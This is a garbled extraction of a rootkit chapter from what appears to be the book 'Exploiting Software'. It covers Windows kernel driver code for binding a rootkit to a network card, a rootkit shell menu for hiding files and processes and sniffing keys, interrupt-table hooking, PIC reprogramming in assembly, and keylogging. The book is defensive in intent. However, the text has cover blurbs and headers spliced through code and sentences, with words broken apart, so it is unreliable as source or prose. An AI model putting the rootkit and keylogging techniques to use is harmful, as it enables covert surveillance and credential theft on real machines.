RtlCopyMemory((PVOID)FullName, At t ack pat t er ns (PVOID)ParentPath.Buffer, Rev er se engineerParentPath.Length); in g Classic at t acks ag ainst serv er soft w ar e Position = FullName + ParentPath.Length / sizeof(WCHAR); Sur pr ising at t acks ag ainst clien t soft war e Position[0] = '\\'; Tech niqu es f or cr aft ing m aliciou s inpu t Position++; The t echn ical det ails of b uf fer ov er f low s RtlCopyMemory((PVOID)Position, Root k it s (PVOID)pInfo->Name, Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. pInfo->NameLength); Position += pInfo->NameLength / sizeof(WCHAR); /* ** */

Null terminate.

Position[0] = UNICODE_NULL; ExFreePool((PVOID)pInfo);

/* • •

Table of Content s

** Get I ndex the value data for binding.

Expl oit ing Softw a re How to Br e ak Code

**Hoglund , Gar y McGr aw By Gr eg */

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

RtlZeroMemory( &aParamTable[0], sizeof(aParamTable) ); I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

aParamTable[0].Flags =

RTL_QUERY_REGISTRY_DIRECT | RTL_QUERY_REGISTRY_REQUIRED;

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew aParamTable[0].Name alls, int ru sion det ect ion sy=st em s,L"ServiceName"; and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. aParamTable[0].EntryContext = theStringP; /* will be allocated */ Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . // Because we are using required and direct, This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t // k we don't need to set defaults. // IMPORTANT note, the last entry is ALL NULL, Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem // required by call to know when it's done. When net w or k secur it y m ech anisms do n ot w or k

Don't forget!

At t ack pat t er ns Status=RtlQueryRegistryValues( Rev er se engineer in g RTL_REGISTRY_ABSOLUTE | serv RTL_REGISTRY_OPTIONAL, Classic at t acks ag ainst er soft w ar e Sur pr ising at t acksFullName, ag ainst clien t soft war e Tech niqu es f or cr aft &aParamTable[0], ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s NULL, Root k it s

NULL );

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. ExFreePool((PVOID)FullName); return(Status); } __except(EXCEPTION_EXECUTE_HANDLER)

{ DbgPrint("rootkit: Exception in EnumSubkeys().

Unknown error.\n");

} return STATUS_UNSUCCESSFUL; •

Table of Content s



I ndex

}

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

/* ___________________________________________________________________________ Pub lish er: Addison Wesley

. Pub This code reads the registry to determine the name of the network interface Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

. card.

It grabs the first registered name, regardless of how many

Pages: 51 2

. are present.

It would be better to bind to all of them, but for

. simplicity we are only binding to the first. How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are . ___________________________________________________________________________ * fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools ReadRegistry( can be u sed t o bIN reak PUNICODE_STRING soft war e? Th is booktheBindingName p rov ides t he answ NTSTATUS ) er { s. Ex p lo i t in g S o ft w aStatus; a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d NTSTATUS t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . UNICODE_STRING aString; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t DbgPrint("ROOTKIT: ReadRegistry called\n"); Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k __try At t ack pat t er ns { Rev er se engineer in g aString.Length = 0; Classic at t acks ag ainst serv er soft w ar e aString.Buffer = ExAllocatePool( PagedPool, MAX_PATH_LENGTH ); /* free me */ Sur pr ising at t acks ag ainst clien t soft war e aString.MaximumLength = MAX_PATH_LENGTH; Tech niqu es f or cr aft ing m aliciou s inpu t RtlZeroMemory(aString.Buffer, MAX_PATH_LENGTH); The t echn ical det ails of b uf fer ov er f low s aStatus Root k it s = EnumSubkeys( Ex p lo i t in g S o L"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows" ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar\y t o b reak soft w ar e. "NT\\CurrentVersion\\NetworkCards", &aString );

if(!NT_SUCCESS(aStatus)){

DbgPrint((

"rootkit: RtlQueryRegistryValues failed Code = 0x%0x\n aStatus));

} else{ •

Table of Content s

RtlAppendUnicodeToString(theBindingName, L"\\Device\\");



I ndex

Expl oit ing Softw a re How to Br e ak Code

RtlAppendUnicodeStringToString(theBindingName, &aString);

By Gr eg Hoglund , Gar y McGr aw

ExFreePool(aString.Buffer); Pub lish er: Addison Wesley

return Pub Dat e: February aStatus; 17, 200 4

/* were good */

I SBN: 0- 20 1- 786 95 -8

}

Pages: 51 2

return aStatus; /* last error */ } How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are __except(EXCEPTION_EXECUTE_HANDLER) fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. { Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal t ack s, at t ack pat t erUnknown ns, t ools, error. an d DbgPrint("rootkit: Exception occurred in at ReadRegistry(). \n" t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . } This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he return STATUS_UNSUCCESSFUL; scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns

Usingboron Tags for Security Rev er se engineer in g On e nice t r ick t o use t o pr event people f rom det ect ing t h e r oot kit net w or k int erf ace is t o r equ ir e Classic at tpor acks soft w ar e r oot k it w ill r esp ond t o a pack et . This idea can be cer t ain sour ce t oragI ainst P I D vserv alueerb ef ore t he ext end ed t o any d at a in t he packet , b ut t he k ey is t hat som e ob scu re k now ledge is requ ired befo Surkpr at t acks. ag ainst e kit can b e comp iled and cust om ized by any one, t he root it ising will r espond Rem em clien ber tth soft at awar r oot t hu s t he ch oice of ob fuscat ion is lef t u p t o y our im aginat ion . Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s

Adding an Interactive Shell Root k it s

A r oot k it can hav e a rem ot e TCP/ I P sh ell dir ect ly int o t he k er nel. Her e is an exam ple f r om of t he Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak m en u pr ovid ed by on e of t he root k it s at w w w .r oot k it . com : soft w ar e.

Win2K Rootkit by the team rootkit.com Version 0.4 alpha -----------------------------------------command

description



Table of Content s



I ndex

ps

show proclist

Expl oit ing Softw a re How to Br e ak Code

help

this data

By Gr eg Hoglund , Gar y McGr aw

buffertest

debug output

Pub lish er: Addison Wesley

hidedir Pub Dat e:

February 17,hide 200 4

prefixed file/dir

I SBN: 0- 20 1- 786 95 -8

hideproc

hide prefixed processes

debugint

(BSOD)fire int3

sniffkeys

toggle keyboard sniffer

Pages: 51 2

How oes sof t w are brecho eak ? the How given do at t acker s m ake sof t w ar e br eak on p ur pose? Why are echo d string fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t oolsmeans can beBlue u sedScreen t o b reakofsoft war e? Th is book p rov ides t he answ er s. *(BSOD) Death Ex t in g S o debugger ft w a re is loaded w itpresent! h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d if palo ikernel is not t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m umeans st fir st the lear nprocess h ow r ealor at t acks are really carr ied ou t . *'prefixed' filename This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he starts with the letters '_root_'. scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t ; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Interrupts I nt er ru pt s ar e a cr u cial p ar t of any com pu t at ional sy st em . All ex t ern al har d war e m ust com mu nicat e w it h t he CPU t o init iat e inp ut and out p ut op er at ions. A subv ersiv e pr ogr am m ay w ant t o snif f or alt er t hese inpu t / out p ut operat ion s. This m ay be u sef ul f or pr ov iding st ealt h , •set t in g up cov Table Content er t of chan nels,s or sim ply eav esdr opp ing on a conv er sat ion. •

I ndex

Expl oit ing Softw a re How to Br e ak Code

Intel Interrupt Request (IRQ) Architecture By Gr eg Hoglund , Gar y McGr aw

er: Addison Wesley On Pub a t lish yp ical I n t el or look- alik e m ot her boar d, t he I RQ for t he k ey boar d cont r oller ch ip is I RQ 1 Pub 4 ( t h er e Dat ar ee:aFebruary t ot al of17,16200I RQs) . I RQ m eans int er r upt r eq uest . Older sy st em s allow t h e user t o 1-ber 786 95 -8 per ip herals m an ually. Syst em s t hat use Plug n Play con figu re t his set t heI SBN: I RQ 0-n 20 um f or inf ormPages: at ion 51 m2anually as w ell. Here is a t able of I RQs ( av ailab le fr om ht t p: / / w ebopedia. com) :

I RQ 0

Sy st em t im er

This in t er r upt is r eser ved for t he int er nal sy st em t im er . I t is never How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are av ailab le t o p er iph er als or ot h er devices. fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What u sedoard t o b reak soft war e? Th is book p rov ides t he answ er s. I RQ 1t ools can be Keyb Ex p lo i t in g S o ft w This a re isinloaded ex amp r eal at toard ack s,cont at t ack pat t er ns,on t ools, an d t er r upt wisit rheser ved les for of t he k eyb r oller . Even t echniqu es used bydev bad guy t o br t w ar I f yint ouerwruant t o ex p rot ect ely y ourforsof t w ar e fr om ices w its hou t aeak keysof boar d, e. t his pt is clusiv at t ack , y ou m u st fir st boar lear n ow tr.eal at t acks are really carr ied ou t . k ey d hinpu I RQ m 2 ust - h ave book Cascade int er r upt for I RQs 8– 15 This m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t This in t er r upt cascad es t he second int er r upt cont r oller t o t h e fir st . I RQ 3 d ser ialcon port inue t ( COM2 ) a ser ious p r oblem Why sof t w ar eSecon ex ploit w ill t o be in t erit ryup f oranisms t he second serwial When net w orThe k secur mtech do n ot or kpor t and oft en t he default int er ru pt for t he f our t h ser ial por t ( COM4 ) . At t ack pat t erFirst ns ser ial por t ( COM1 ) I RQ 4 Rev er se engineer This in in gt er r upt is nor m ally used f or t h e fir st ser ial p ort . On dev ices t hat do not use a PS/ 2 m ouse, t h is in t err up t is alm ost alw ay s used Classic at t acks ag ainst serv er soft w ar e by t he ser ial m ou se. Th is is also t he d ef ault in t er r up t f or t he t hir d ial ag p ort ( COM3) Sur pr ising atser t acks ainst clien .t soft war e I RQ 5 Soun d car d Tech niqu es f or cr aft ing m aliciou s inpu t This in t er r upt is t h e fir st choice t hat m ost sound car ds m ak e w hen The t echn icallook det in ails uf fer er ft low g fof or ban I RQovset in g.s Root k it s I RQ 6

Floppy d isk cont roller

Ex p lo i t in g S o ft w This a re isinftilled witis h rt eser h e t ools, cont he cept s, andd kn ledg e necessar y t o b reak er r upt ved for f loppy iskow cont roller. soft w ar e. I RQ 7 First par allel p ort This in t er r upt is nor m ally r eserv ed for t h e use of t h e pr int er. I f a pr int er is n ot b eing u sed, t his int er ru pt can b e used f or ot her dev ices t h at use p arallel por t s.

I RQ 8

Real- t im e clock This in t er r upt is r eser ved for t he sy st em 's real- t im e clock t im er and can not be used for an y ot her pu r pose.

I RQ 9

Op en int er r upt This in t er r upt is t y pically lef t op en on dev ices for t he u se of



Table ofper Content iphersals.



I ndex

I RQoit10 Op en inte er upt Expl ing Softw a re How to Br ak rCode By Gr eg Hoglund , Gar y McGr aw

This in t er r upt is t y pically lef t op en on dev ices for t he u se of per ipher als.

Pub lish er: Addison Wesley

I RQ 11Dat e: Pub

FebruaryOp 17,en 200int 4 er r upt

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

I RQ 12

This in t er r upt is t y pically lef t op en on dev ices for t he u se of per ipher als. PS/ 2 m ouse

This in t er r upt is r eser ved for t he PS/ 2 m ouse on m ach ines t hat use one. I f a PS/ 2 m ouse is n ot u sed, t he int er r upt can b e used f or How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are ot her p er iph er als, such as a net w or k car d. fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be Float u sedint o reak unit soft/war e? Th is book p rov ides t he answ er s. I RQ 13 g bpoint copr ocessor Ex p lo i t in g S o ft w This a re isinloaded ex amp r eal t ack s, float at t ack t ertns, t er r upt wisit rheser ved les for of t he int at egr at ed ingpat p oin u nitt ools, . I t isan d t echniqu es used bynev bad s t o brteak w arals e. or I f yotou w ant t o p rot ect y our sofused t w ar e fr om er guy available o persof ip ther her d ev ices b ecause it is at t ack , y ou m u st fir st lear n h ow ealerat t acks are really carr ied ou t . exclusively f or rint nal signaling . I RQ m 14ust - h ave book Pr imar y Ishock DE chann el This m ay y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t This in t er r upt is r eser ved for use by t h e pr im ary I D E cont r oller. On syst em s t hat do not use I DE devices, t he I RQ can b e used f or h er pur Why sof t w ar eanot ex ploit w illpose. con t inue t o be a ser ious p r oblem dar I DE annel do n ot w or k When net w orSecon k secur it yy m echch anisms I RQ 15 At t ack pat t erThis ns in t er r upt is r eser ved for use by t h e second ary I D E cont roller Rev er se engineer in g The I DT supp ort s 256 ent r ies, only 16 of w hich are t yp ically ut ilized as har dw ar e int er ru pt s t acks servain er ssoft ar ay e of 8 - by t e seg m en t descript ors called gat es. Th e on anClassic x8 6 sy at st em . Thag e ainst I DT cont an warr I DT m u st alw ays be in unsw app ed m em or y . Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t

Hooking the Interrupt Descriptor Table (IDT) The t echn ical det ails of b uf fer ov er f low s Under Wind ow s NT, int er r upt s h andle m an y imp ort ant sy st em ev ent s. I nt er r upt 0x2E, f or Root k it s exam ple, is called f or ever y syst em call. Ev en t h ough our root kit ex am ples show h ow t o hook syst em calls on an in divid ual b asis, w e could also hook int er r upt 2E d irect ly. We can also Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak hook ot her int er ru pt s, such as t he k eyb oar d in t er r upt , and t hu s int er cept k ey st r okes. soft w ar e. An int err u pt h ook can b e inst alled w it h t he f ollowin g code: [ View full size im age]



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are The Mystery the Programmable Interrupt fir ew alls, int ru sionofdet ect ion sy st em s, and ant iv ir us soft warController e n ot k eep in g (PIC) out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. I f you h ave ev er w ork ed w it h int er r upt hook s, you w ill r ealize t hat t he I RQ nu mb er s assigned Ex lo idw t inar g eSdo o ftnot w a re is loaded exeamp lesu pt of dr eal t ack er ns, an dfor to p har direct ly m apw titoht h int err escrat ipt or ts, abat le.t ack Forpat ex tam ple,t ools, t he I RQ echniqu es used guy s t o1.brBut eak sofer t wruarpte.1I fisy not ou wt he antk tey o boar p rot ect y ourcan sof ttw ar e fr om tt he key boar d harby dw bad ar e is I RQ , int d ! How his b e? at t ackly, yt here ou m is u sta fir st learion n h occur ow r eal at bet t acks are t he really ied t . an d t he int er r upt vect or s Clear t r anslat r ing w een harcarr dw ar e Iou RQs st or ed in t he int er r upt descr ipt or t able. The secret lies in t he PI C. On m ost m ot her boar ds t h is This m ust ave m ay shock y ou—and it will cercan t ainly e ymou. ing w ill be an -Ihnt el 8book 259 or com pat ible ch ip . The 8 259 be educat p rog ram edGet t o tm ap bey t heond I RQt he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t nu mb er s t o soft w ar e int er r upt s. Th is m ean s t he h ard - w ired I RQ lin es ent er on e sid e of t he 82 59, and a single in t er r upt line com es out t he ot h er side. Th e 825 9 hand les t h e conv er sion t o a soft w ar e int er r upt and inf orm s t he CPU t hat a giv en soft war e in t er r upt has occur r ed. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Ther e ar e t y pically 1 6 h ar dw ar e int err up t lines h andled by t he 825 9. By d ef ault , m ost BI OS When net w or k secur it y m ech anisms do n ot w or k soft w ar e w ill pr ogr am t he 82 59 on boot t o m ap I RQs 0 –7 t o soft war e in t er r upt s 8–1 5. Th us, I RQ 1Atfor t h epat k ey t ack t erboar ns d is hand led as int er r upt 8. Thus t he m y st er y of I RQ t o int er r upt is solved. Rev er se engineer in g Under Wind ow s NT/ 200 0/ XP you w ill fin d t hat t he old int - 9 hook d oesn' t wor k f or t he k ey boar d. The easonagisainst t h at serv t h e er 825 9 has Classic at tracks soft w ar ebeen repr ogr am m ed b y Window s t o m ap I RQ 0– 15 t o sof t w are in t er r up t s 0x 30 –0x 3F. Thu s, t o h ook t he k ey boar d in t er r up t un der Wind ows y ou nSur eedprt oising hookatint er r upt 0x 31.clien A secon m yest er y solv ed . t acks ag ainst t soft dwar You can, cour ogr t he 82 s59inpu yout r self. We now pr esent som e ad dit ional st ealt h Techof niqu esse, f or repr cr aft ingam m aliciou t r ick s f or a root k it dr iv er . The f ollow in g code sn ip pet illust r at es r ep rog ram m ing t he 8259 so t echn uftfer t hat I The RQ 0–7 arical e mdet appails ed tof o bsof w arov e er intf low er rus pt s 2 0h– 27h: Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

mov

al, 11h

How d oes sof t wal are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are out 20h, fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools canal be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. out A0h, Ex g So ft w a re is;loaded w it h interrupt ex amp les ofnumber r eal at t ack movp lo i t inal, 20h starting 20hs, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y21h, ou m ual st fir st lear n h ow r eal at t 0-7 acks are really carr ied ou t . out ; 21h for IRQ This m ust - h ave shock y ou—and it will number cer t ainly28h educat e y ou. Get t ing bey ond t he mov al, 28hbook m;aystarting interrupt scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t out mov out mov out mov out out

A1h, al

; A1h for IRQ 8-15

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem al, 04h When net w or k secur it y m ech anisms do n ot w or k 21h, al At t ack pat t er ns al, 02h Rev er se engineer in g A1h, al Classic at t acks ag ainst serv er soft w ar e al, 01h Sur pr ising at t acks ag ainst clien t soft war e 21h, al Tech niqu es f or cr aft ing m aliciou s inpu t A1h, al The t echn ical det ails of b uf fer ov er f low s Root k it s

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Key Logging Key logging is on e of t he m ost p ow er f ul spy w ar e t ech niques. Usin g a hook on t h e key boar d han dler w it hin t he k er n el, t h e r oot k it can sn if f pass ph rases, including t h ose u sed t o unlock pr iv at e k ey s in a cr yp t ogr aph ic sy st em. A k ey st r oke log does n ot t ak e u p m uch space and can •log act iv it y f Table ofsContent s or day or w eeks b ef or e t he at t ack er needs t o pick up t he log f ile. Th e key st r ok e •logger can det I ndex ect cont r ol k ey comb in at ions as w ell as n orm al ch aract er s in upper or Expl oitcase. ing Softw Howeach to Br ekak Code low er Typa re ically eyst r oke is ref er r ed t o as a scan cod e. A scancod e is t he n um er ical rByep esent at ion ofy t McGr he k aw eyst r ok e in m em or y. Grreg Hoglund , Gar Key logger s hav e t ak en m any for m s ov er t he last d ecade, an d t h e t ech niqu e depends on t he Pub lish er: Addison Wesley OS being in fect ed . On m any old er W in dow s and D OS m achines, hook ing int er ru pt 9 w as Pub Dat e: February 17, 200 4 enoug h t o gat h er key st rok es. On Window s NT and bey ond, t he k eyst r oke mon it or m ust b e I SBN: 786 95 -8 ilar con dit ions ex ist un der Linu x. inst alled as 0a 20 dr1-iver . Sim Pages: 51 2

From t he at t ack er' s per spect iv e, t he follow in g t w o issu es r em ain: h ow t h e dat a are st or ed in t he file, and w ho t hey ar e sent t o over t h e net w or k. I f k eyst r ok es ar e st or ed in plain t ext , t hen t hose k eyst r ok es ar e av ailable t o all r ogue in t er loper s. I f t hey are sent t o som eone's em ail add ress, t hen t hat person w ill be in t er r ogat ed. These issues can b e r esolv ed using cry pt dogr aphy e key st rok es can e tst or eds in pub lic - en cr yeak pt ed m pose? , and tWhy h ey ar e How oes sof .t wTh are br eak ? How do bat acker m ake sofkey t w ar e br onfor p ur are br oadcast ov er a publically readab le yet obscur e ch annel. A cr y pt ot r oj an at t ack t hat uses t his fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? app roach w as pu blish ed by Young and Yu ng at I EEE Secur it y and Pr ivacy . What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniquKey es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Linux Logger at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . A coup le of Linu x key logg er s h ave been pu blish ed an d t h e sour ce cod e is av ailab le. Th ese This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he pr ogr am s t y pically operat e as loadable k er nel m odules ( lkms) . Under a UNI X sy st em , t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t r oot k it is usually alr eady im plem ent ed as an lkm, so k ey st r ok e m onit or ing is ju st an ext ension of t he code. A Linu x r oot kit can h ook int o t he char act er st ream v ia t h e exist ing k ey boar d dr ivter ore itexcan h e tint err tuoptbeh andler f or pt he k ey boar d d irect ly. Why sof w ar ploithook w ill tcon inue a ser ious r oblem When net w or k secur it y m ech anisms do n ot w or k

Windows NT/2000/XP Key Logger At t ack pat t er ns Wind ows NT/ 0/ XP su Rev er se 200 engineer in gppor t s a sp ecial t y pe of device dr iv er called a filt er dr iv er . Most dr iv er s u nder Wind ow s ar e placed int o chains. That is, each dr iv er passes dat a t o t he n ex t dr iv erClassic in a chat ain. A filt dr iver sim t acks ager ainst serv er ply softinsert w ar e s it self int o a chain and sip hons dat a or mod ifies dat a in t ran sit befor e p assing con t rol. There is alr eady a key boar d dr iver chain int o wh ich a Sur pr ising ag ainst clien r oot k it can in ser at t itt acks self. Of cou rse, t h te soft keywar boare d in t err up t can also be h ooked dir ect ly . Eit h er w ay , k ey st rok es can be capt u red and logged t o a file, or sent over t h e net w or k. Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s

The Keyboard Controller Chip

Root k it s On t he sy st em m ot her boar d t here ar e m any har dw ar e cont r oller chip s. These chip s cont ain Ex loer i t in S ocan ft w abe reris f illed wititht en t h et o. t ools, con cept s, and y t o bchip reaks ar e r egpist s tgh at ead or wr Ty pically , r ead/ w r itkn e row egledg ist eres necessar on cont r oller soft w ar e.t s. A key boar d w ill usually con t ain an 8 048 m icr op rocessor . The mot herb oard w ill called por usually h ave an add it ional 8 042 m icr opr ocessor . The 804 2 w ill b e pr ogr am med t o con ver t scan cod es fr om t h e key boar d. Som et im es t he 8 042 w ill also be h andling PS/ 2 m ouse inpu t and possibly t he reset sw it ch f or t he CPU. For t he key boar d cont roller, w e ar e int erest ed in t h e follow ing por t s: Por t 0 x6 0: 804 8 chip , key boar d dat a regist er

Por t 0 x6 4: 804 2, k ey boar d st at us regist er To r ead ch ar act er s fr om t he k ey boar d , y ou m ust hook t h e k ey boar d int err u pt . Th is w ill chang e dependin g on y our OS. For a Win dow s syst em , t he hook w ill m ost likely be in t 0 x3 1. On ce I RQ 1 has fir ed , t he d at a m u st be r ead fr om 0x 60 b ef ore any m or e key boar d int err u pt s w ill occu r. Here is a simp le hand ler f or t h e key boar d int err up t : •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2 KEY_INT:

push

eax

in al, 60h How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are // rudo something with fir ew alls, int sion det ect ion sy st emcharacter s, and ant ivin ir usalsoft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. pop eax Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy PTR s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om jmp DWORD [old_KEY_INT] at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Advanced Rootkit Topics Ther e isn 't enoug h r oom in t his book t o cov er all t h e adv anced t r icks t hat can be perf or med by r oot k it s. Fort unat ely , t her e ar e m any r esou rces and ar t icles av ailable on t he I nt er net t hat cover t h is subj ect . One gr eat resour ce is Phr ack Magazine ( ht t p: / / w w w . phr ack. com ) . An ot her •is t he Black Hat Table of Content s fer en ce ( ht t p: / / w w w . black hat .com ) . We br ief ly descr ibe a sm all secu r it y con • I ndext echn iq ues her e, pr ovid in g ref er ences t o m or e inf orm at ion w hen applicable. set of adv anced Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Using a Rootkit as a Debugger Pub lish er: Addison Wesley Pub Datre: February 17, 200hav 4 e t o be m aliciou s. You can use one t o k eep w at ch on a syst em y ou A k er nel oot kit doesn't I SBN:g reat 0- 20 1-use 786 95 ow n. One of-8a r oot k it is t o r ep licat e t h e fu nct ions of a debug ger. A r oot k it w it h a shell and som Pages: 51 2e debug ging fu nct ions is r eally no d iffer ent t han a d eb ugg er lik e Soft I ce. You can add a decom piler , t h e abilit y t o read and w r it e m em or y , and br eak point supp ort .

